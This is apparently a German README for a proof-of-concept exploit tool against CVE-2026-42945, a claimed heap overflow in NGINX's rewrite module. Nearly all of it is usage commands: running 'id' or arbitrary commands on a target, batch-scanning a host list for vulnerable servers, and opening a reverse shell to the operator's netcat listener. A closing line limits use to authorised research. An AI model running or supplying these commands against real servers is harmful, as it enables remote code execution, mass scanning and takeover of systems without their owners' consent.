
Proof-of-Concept-Exploit für CVE-2026-42945 (NGINX Rift) mit Multi-Mode-RCE, Blind-Verifizierung, Reverse Shell und Batch-Scanning-Fähigkeiten für autorisierte Sicherheitsforschung.
Ein professionelles Proof-of-Concept-Tool (PoC) zur Erforschung und Identifizierung der NGINX-Rift-Schwachstelle, einem kritischen Heap-basierten Pufferüberlauf im ngx_http_rewrite_module.
id-Befehl ausführen (Standard).python3 poc.py --url http://target.com --method id
Erstellen Sie eine Datei namens targets.txt mit einer URL pro Zeile:
http://1.2.3.4
https://docs.company.com
http://server.internal:8080
Dann führen Sie aus:
python3 poc.py --list targets.txt --method sleep
python3 poc.py --url http://target.com --cmd "whoami" --verbose
Starten Sie zuerst Ihren Listener: nc -lvp 1337
python3 poc.py --url http://target.com --method shell --listen-ip [YOUR_IP] --listen-port 1337
Dieses Tool dient nur zu Bildungszwecken und autorisierten Sicherheitsaudits. Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Skript verursacht werden. Holen Sie immer eine ausdrückliche Genehmigung ein, bevor Sie eine Infrastruktur testen.